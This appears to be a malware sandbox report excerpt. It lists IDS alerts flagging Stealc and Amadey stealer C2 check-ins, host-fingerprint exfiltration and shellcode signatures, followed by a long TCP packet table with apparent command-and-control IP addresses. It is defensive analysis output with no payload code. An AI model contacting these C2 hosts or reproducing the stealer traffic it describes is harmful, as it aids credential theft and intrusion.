2024-07-26T20:09:03.978363+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:09:04.167115+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:09:01.806810+0200	TCP	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:09:09.878806+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:10:24.507923+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	49814	80	192.168.2.5	85.28.47.31
2024-07-26T20:10:06.972949+0200	TCP	2856122	ETPRO MALWARE Amadey CnC Response M1	80	49725	185.215.113.19	192.168.2.5
2024-07-26T20:09:56.350187+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49723	52.165.165.26	192.168.2.5
2024-07-26T20:09:19.522483+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49705	80	192.168.2.5	185.215.113.16
2024-07-26T20:10:21.763678+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	49791	142.250.186.163	192.168.2.5
2024-07-26T20:09:11.402795+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:09:03.426741+0200	TCP	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:09:02.028955+0200	TCP	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:09:17.190606+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49705	80	192.168.2.5	185.215.113.16
2024-07-26T20:10:43.434167+0200	TCP	2012510	ET SHELLCODE UTF-8/16 Encoded Shellcode	443	64128	142.250.186.99	192.168.2.5
2024-07-26T20:10:05.333597+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49726	80	192.168.2.5	185.215.113.16
2024-07-26T20:09:14.147674+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:09:04.057100+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:09:14.570552+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:10:08.878728+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	49732	80	192.168.2.5	85.28.47.31
2024-07-26T20:10:05.806428+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49726	185.215.113.16	192.168.2.5
2024-07-26T20:09:01.592448+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:09:12.364155+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:10:10.575393+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	49736	80	192.168.2.5	185.215.113.19
2024-07-26T20:09:11.027673+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:09:11.221575+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:09:11.911739+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:10:04.271009+0200	TCP	2856147	ETPRO MALWARE Amadey CnC Activity M3	49725	80	192.168.2.5	185.215.113.19
2024-07-26T20:10:40.334860+0200	TCP	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	64119	80	192.168.2.5	85.28.47.31
2024-07-26T20:09:01.815034+0200	TCP	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:09:11.403569+0200	TCP	2002725	ET ACTIVEX COM Object Instantiation Memory Corruption Vulnerability MS05-054	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:11:10.890598+0200	TCP	2800029	ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass	80	64043	34.104.35.123	192.168.2.5
2024-07-26T20:09:18.087880+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49706	52.165.165.26	192.168.2.5
2024-07-26T20:09:04.411058+0200	TCP	2011803	ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:09:04.672505+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:09:13.671490+0200	TCP	2009080	ET MALWARE VMProtect Packed Binary Inbound via HTTP - Likely Hostile	80	49704	85.28.47.31	192.168.2.5
2024-07-26T20:09:11.629575+0200	TCP	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	49704	80	192.168.2.5	85.28.47.31
2024-07-26T20:10:08.647743+0200	TCP	2803305	ETPRO MALWARE Common Downloader Header Pattern H	49731	80	192.168.2.5	185.215.113.16
2024-07-26T20:10:07.729391+0200	TCP	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	49729	80	192.168.2.5	185.215.113.19

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 26, 2024 20:08:56.421791077 CEST	49675	443	192.168.2.5	23.1.237.91
Jul 26, 2024 20:08:56.421792984 CEST	49674	443	192.168.2.5	23.1.237.91
Jul 26, 2024 20:08:56.515574932 CEST	49673	443	192.168.2.5	23.1.237.91
Jul 26, 2024 20:09:00.135212898 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:00.140872955 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:00.141072989 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:00.141221046 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:00.147495031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:00.789741039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:00.790184021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:00.792881966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:00.799819946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:01.592344046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:01.592447996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:01.593898058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:01.600966930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:01.806668043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:01.806809902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:01.806811094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:01.806907892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:01.809555054 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:01.815033913 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.018393040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.018559933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:02.018665075 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.018703938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.018740892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:02.018789053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:02.019315004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.019351006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.019386053 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:02.019414902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:02.020159006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.020236969 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:02.022902966 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:02.028954983 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.214889050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.215059996 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:02.244610071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:02.244699955 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:02.250865936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.250905991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.250933886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.250968933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.252466917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.252541065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:02.254069090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.426412106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.426740885 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.707077980 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.712034941 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.889301062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.889343023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.889360905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.889386892 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.889450073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.889982939 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.890070915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.891851902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.891886950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.891921043 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.891952991 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.892215014 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.892250061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.892303944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.892304897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.893115997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.893184900 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.893399000 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.893431902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.893462896 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.893488884 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.894283056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.894345999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.976111889 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.976216078 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.977215052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.977251053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.977282047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.977313042 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.978363037 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.978399992 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.978427887 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:03.978439093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.978439093 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:03.978482008 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.010616064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.010658979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.010704041 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.010731936 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.011657953 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.011696100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.011725903 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.011750937 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.012605906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.012639046 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.012670040 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.012700081 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.013709068 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.013744116 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.013772011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.013798952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.014812946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.014847994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.014875889 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.014903069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.015888929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.015940905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.015949011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.016028881 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.017038107 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.017072916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.017102003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.017106056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.017121077 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.017163038 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.017919064 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.017955065 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.017986059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.018013000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.018789053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.018824100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.018857002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.018904924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.055933952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.056016922 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.056212902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.056248903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.056277037 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.056304932 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.057100058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.057163954 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.057635069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.057668924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.057698011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.057725906 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.058635950 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.058669090 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.058696032 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.058723927 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.063565969 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.063596010 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.063635111 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.063640118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.064553976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.064583063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.064616919 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.064647913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.074686050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.074754000 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.074872971 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.074934959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.075010061 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.075066090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.075491905 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.075531006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.075563908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.075591087 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.076383114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.076445103 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.077671051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.077702999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.077744007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.077744007 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.078600883 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.078634977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.078668118 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.078695059 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.079549074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.079564095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.079577923 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.079606056 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.079631090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.080430984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.080446959 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.080507994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.080507994 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.081373930 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.081389904 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.081429005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.081459045 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.082104921 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.082119942 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.082154036 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.082178116 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.082854986 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.082870960 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.082906961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.082937002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.083591938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.083609104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.083626032 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.083642960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.083672047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.083672047 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.084342957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.084358931 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.084391117 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.084415913 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.085099936 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.085115910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.085148096 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.085174084 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.085828066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.085844994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.085875988 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.085901022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.086556911 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.086572886 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.086586952 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.086606026 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.086636066 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.086637020 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.100295067 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.100353003 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.100688934 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.100697994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.100750923 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.100960970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.100971937 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.101022959 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.101622105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.101633072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.101641893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.101672888 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.101701975 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.138807058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.138818979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.138828993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.138875961 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.138905048 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.139275074 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.139286041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.139333963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.149493933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.149503946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.149554968 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.149585962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.154206991 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.154220104 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.154230118 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.154270887 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.154299974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.160638094 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.160672903 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.160722017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.160742998 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.160947084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.161005974 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.161966085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.162029982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.162128925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.162162066 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.162192106 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.162216902 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.165288925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.165345907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.165435076 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.165466070 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.165493011 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.165524006 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.165837049 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.165869951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 20:09:04.165898085 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 20:09:04.165923119 CEST	49704	80	192.168.2.5	85.28.47.31
